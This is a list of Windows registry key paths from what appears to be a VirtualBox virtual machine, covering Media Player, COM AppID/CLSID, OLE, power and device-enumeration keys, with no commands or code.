HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Events\{08432F33-FDBC-422D-AEE0-FC61F43E7059}\{424D33A4-8055-498D-9ECE-6FCE0CB2FF40}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Events\{08432F33-FDBC-422D-AEE0-FC61F43E7059}\{424D33A4-8055-498D-9ECE-6FCE0CB2FF40}\Reason
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Events\{08432F33-FDBC-422D-AEE0-FC61F43E7059}\{424D33A4-8055-498D-9ECE-6FCE0CB2FF40}\ID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Events\{08432F33-FDBC-422D-AEE0-FC61F43E7059}\{424D33A4-8055-498D-9ECE-6FCE0CB2FF40}\Data
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Events\{08432F33-FDBC-422D-AEE0-FC61F43E7059}\{424D33A4-8055-498D-9ECE-6FCE0CB2FF40}\Scope
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Events\{B5FDDA72-4B7A-4C2A-89FA-188D0C9654B9}\{424D33A4-8055-498D-9ECE-6FCE0CB2FF40}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Events\{B5FDDA72-4B7A-4C2A-89FA-188D0C9654B9}\{424D33A4-8055-498D-9ECE-6FCE0CB2FF40}\Reason
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Events\{B5FDDA72-4B7A-4C2A-89FA-188D0C9654B9}\{424D33A4-8055-498D-9ECE-6FCE0CB2FF40}\ID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Events\{B5FDDA72-4B7A-4C2A-89FA-188D0C9654B9}\{424D33A4-8055-498D-9ECE-6FCE0CB2FF40}\Data
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Events\{B5FDDA72-4B7A-4C2A-89FA-188D0C9654B9}\{424D33A4-8055-498D-9ECE-6FCE0CB2FF40}\Scope
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Events\{B5FDDA72-4B7A-4C2A-89FA-188D0C9654B9}
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\WindowsMediaPlayer\
HKEY_LOCAL_MACHINE\Software\Microsoft\MediaPlayer\Preferences\HME\S-1-5-21-1822907384-1282624486-319450072-1000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\AcceptedPrivacyStatement
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Health\{938B897F-B0AE-41F1-8903-0B946BE8C919}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Events\{B5FDDA72-4B7A-4C2A-89FA-188D0C9654B9}\{0E8FE71A-713F-43FB-BC1A-D7A3C7B6253A}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Events\{B5FDDA72-4B7A-4C2A-89FA-188D0C9654B9}\{0E8FE71A-713F-43FB-BC1A-D7A3C7B6253A}\Reason
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Events\{B5FDDA72-4B7A-4C2A-89FA-188D0C9654B9}\{0E8FE71A-713F-43FB-BC1A-D7A3C7B6253A}\ID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Events\{B5FDDA72-4B7A-4C2A-89FA-188D0C9654B9}\{0E8FE71A-713F-43FB-BC1A-D7A3C7B6253A}\Data
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Events\{B5FDDA72-4B7A-4C2A-89FA-188D0C9654B9}\{0E8FE71A-713F-43FB-BC1A-D7A3C7B6253A}\Scope
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Events\{E24175B1-C9F6-48E5-AA73-51BC55C418B6}\{0E8FE71A-713F-43FB-BC1A-D7A3C7B6253A}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Events\{E24175B1-C9F6-48E5-AA73-51BC55C418B6}\{0E8FE71A-713F-43FB-BC1A-D7A3C7B6253A}\Reason
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Events\{E24175B1-C9F6-48E5-AA73-51BC55C418B6}\{0E8FE71A-713F-43FB-BC1A-D7A3C7B6253A}\ID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Events\{E24175B1-C9F6-48E5-AA73-51BC55C418B6}\{0E8FE71A-713F-43FB-BC1A-D7A3C7B6253A}\Data
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Events\{E24175B1-C9F6-48E5-AA73-51BC55C418B6}\{0E8FE71A-713F-43FB-BC1A-D7A3C7B6253A}\Scope
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Events\{E24175B1-C9F6-48E5-AA73-51BC55C418B6}
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Health\{2DEBD43D-58B9-4E76-B06E-6227AF51005A}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\LocalService
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\ServiceParameters
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\RunAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\ActivateAtStorage
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\ROTFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\AppIDFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\LaunchPermission
HKEY_LOCAL_MACHINE\Software\Microsoft\OLE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\LegacyAuthenticationLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\LegacyImpersonationLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\AuthenticationLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\RemoteServerName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\SRPTrustLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\PreferredServerBitness
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\LoadUserSettings
HKEY_USERS\S-1-5-20_Classes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\LocalServer32\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\LocalServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\LocalServer32\ServerExecutable
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\AppID
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\LocalService
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\DllSurrogate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\RunAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\ActivateAtStorage
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\ROTFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\AppIDFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\LaunchPermission
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\AuthenticationLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\RemoteServerName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\SRPTrustLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\PreferredServerBitness
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\LoadUserSettings
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F87137D-0E7C-44D5-8C73-4EFFB68962F2}\Elevation
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{53f56307-b6bf-11d0-94f2-00a0c91efb8b}\##?#IDE#DiskVBOX_HARDDISK___________________________1.0_____#5&33d1638a&0&0.0.0#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}\#
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{53f56307-b6bf-11d0-94f2-00a0c91efb8b}\##?#IDE#DiskVBOX_HARDDISK___________________________1.0_____#5&33d1638a&0&0.0.0#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{53f56307-b6bf-11d0-94f2-00a0c91efb8b}\##?#IDE#DiskVBOX_HARDDISK___________________________1.0_____#5&33d1638a&0&0.0.0#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}\DeviceInstance
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{53f56307-b6bf-11d0-94f2-00a0c91efb8b}\Properties
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\PCIIDE\IDECHANNEL\4&2617AEAE&0&0
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\PCIIDE\IDECHANNEL\4&2617AEAE&0&0\ClassGUID
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\PCI\VEN_8086&DEV_2829&SUBSYS_00000000&REV_02\3&267A616A&0&68
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\PCI\VEN_8086&DEV_2829&SUBSYS_00000000&REV_02\3&267A616A&0&68\ClassGUID
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\ACPI\PNP0A03\0
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\ACPI\PNP0A03\0\ClassGUID
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\ACPI_HAL\PNP0C08\0
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\ACPI_HAL\PNP0C08\0\ClassGUID
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\ROOT\ACPI_HAL\0000
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\ROOT\ACPI_HAL\0000\ClassGUID
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HTREE\ROOT\0
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HTREE\ROOT\0\ClassGUID
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\IDE\DISKVBOX_HARDDISK___________________________1.0_____\5&33D1638A&0&0.0.0
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\IDE\DISKVBOX_HARDDISK___________________________1.0_____\5&33D1638A&0&0.0.0\Capabilities
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\IDE\DISKVBOX_HARDDISK___________________________1.0_____\5&33D1638A&0&0.0.0\ConfigFlags
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\IDE\DISKVBOX_HARDDISK___________________________1.0_____\5&33D1638A&0&0.0.0\LogConf
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\IDE\DISKVBOX_HARDDISK___________________________1.0_____\5&33D1638A&0&0.0.0\LogConf\ForcedConfig
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\IDE\DISKVBOX_HARDDISK___________________________1.0_____\5&33D1638A&0&0.0.0\DeviceDesc
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Control Panel\International\LocaleName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\IDE\DISKVBOX_HARDDISK___________________________1.0_____\5&33D1638A&0&0.0.0\FriendlyName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\IDE\DISKVBOX_HARDDISK___________________________1.0_____\5&33D1638A&0&0.0.0\Mfg
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Power\PowerRequestOverride
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Power\PowerRequestOverride
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Power\PowerRequestOverride\Driver
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{69AD4AEE-51BE-439B-A92C-86AE490E8B30}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{69AD4AEE-51BE-439B-A92C-86AE490E8B30}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{69AD4AEE-51BE-439B-A92C-86AE490E8B30}\LocalService
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{69AD4AEE-51BE-439B-A92C-86AE490E8B30}\ServiceParameters
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{69AD4AEE-51BE-439B-A92C-86AE490E8B30}\RunAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{69AD4AEE-51BE-439B-A92C-86AE490E8B30}\ActivateAtStorage
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{69AD4AEE-51BE-439B-A92C-86AE490E8B30}\ROTFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{69AD4AEE-51BE-439B-A92C-86AE490E8B30}\AppIDFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{69AD4AEE-51BE-439B-A92C-86AE490E8B30}\LaunchPermission
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{69AD4AEE-51BE-439B-A92C-86AE490E8B30}\AuthenticationLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{69AD4AEE-51BE-439B-A92C-86AE490E8B30}\RemoteServerName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{69AD4AEE-51BE-439B-A92C-86AE490E8B30}\SRPTrustLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{69AD4AEE-51BE-439B-A92C-86AE490E8B30}\PreferredServerBitness
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{69AD4AEE-51BE-439B-A92C-86AE490E8B30}\LoadUserSettings
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\PCI\VEN_80EE&DEV_CAFE&SUBSYS_00000000&REV_00\3&267A616A&0&20
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\PCI\VEN_80EE&DEV_CAFE&SUBSYS_00000000&REV_00\3&267A616A&0&20\Class
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\IDE\CDROMVBOX_CD-ROM_____________________________1.0_____\5&106AF171&0&1.0.0
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\IDE\CDROMVBOX_CD-ROM_____________________________1.0_____\5&106AF171&0&1.0.0\HardwareID
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\PCI\VEN_8086&DEV_7111&SUBSYS_00000000&REV_01\3&267A616A&0&09
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\PCI\VEN_8086&DEV_7111&SUBSYS_00000000&REV_01\3&267A616A&0&09\HardwareID
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\PCIIDE\IDECHANNEL\4&2617AEAE&0&0\HardwareID
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\PCIIDE\IDECHANNEL\4&2F42C713&0&0
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\PCIIDE\IDECHANNEL\4&2F42C713&0&0\HardwareID
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\PCIIDE\IDECHANNEL\4&2F42C713&0&1
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\PCIIDE\IDECHANNEL\4&2F42C713&0&1\HardwareID
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\PCI\VEN_8086&DEV_2829&SUBSYS_00000000&REV_02\3&267A616A&0&68\HardwareID
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\PCI\VEN_80EE&DEV_BEEF&SUBSYS_00000000&REV_00\3&267A616A&0&10
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\PCI\VEN_80EE&DEV_BEEF&SUBSYS_00000000&REV_00\3&267A616A&0&10\HardwareID
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994ad04-93ef-11d0-a3cc-00a0c9223196}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034#4&31e60982&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eCDInTopo
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034#4&31e60982&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034#4&31E60982&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\DeviceInstance
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\Properties
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034#4&31e60982&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eCDInWave
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034#4&31e60982&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eHeadphoneTopo
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034#4&31e60982&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eHeadphoneWave
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034#4&31e60982&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eMicInTopo
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034#4&31e60982&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eMicInWave
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034#4&31e60982&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eSpeakerTopo
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034#4&31e60982&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eSpeakerWave
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034\4&31E60982&0&0001
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034\4&31E60982&0&0001\ClassGUID
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_8384&DEV_7680&SUBSYS_83847680&REV_1034\4&31E60982&0&0001\HardwareID
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#PCI#VEN_8086&DEV_100E&SUBSYS_001E8086&REV_02#3&267a616a&0&18#{ad498944-762f-11d0-8dcb-00c04fc3358c}\#{C2D43895-0262-4873-A789-C2F96D24B693}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#PCI#VEN_8086&DEV_100E&SUBSYS_001E8086&REV_02#3&267a616a&0&18#{ad498944-762f-11d0-8dcb-00c04fc3358c}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#PCI#VEN_8086&DEV_100E&SUBSYS_001E8086&REV_02#3&267a616a&0&18#{ad498944-762f-11d0-8dcb-00c04fc3358c}\DeviceInstance
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\Properties
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#Root#*ISATAP#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\#{684BB8B6-2793-49A5-8012-E0A941B4B4DF}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#Root#*ISATAP#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#ROOT#*ISATAP#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\DeviceInstance
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#Root#MS_AGILEVPNMINIPORT#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\#{29898C9D-B0A4-4FEF-BDB6-57A562022CEE}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#Root#MS_AGILEVPNMINIPORT#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#ROOT#MS_AGILEVPNMINIPORT#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\DeviceInstance
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#Root#MS_L2TPMINIPORT#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\#{E43D242B-9EAB-4626-A952-46649FBB939A}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#Root#MS_L2TPMINIPORT#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#ROOT#MS_L2TPMINIPORT#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\DeviceInstance
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#Root#MS_NDISWANBH#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\#NDISWANBH
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#Root#MS_NDISWANBH#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#ROOT#MS_NDISWANBH#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\DeviceInstance
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#Root#MS_NDISWANIP#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\#NDISWANIP
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#Root#MS_NDISWANIP#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#ROOT#MS_NDISWANIP#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\DeviceInstance
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#Root#MS_NDISWANIPV6#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}\#NDISWANIPV6
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{ad498944-762f-11d0-8dcb-00c04fc3358c}\##?#Root#MS_NDISWANIPV6#0000#{ad498944-762f-11d0-8dcb-00c04fc3358c}
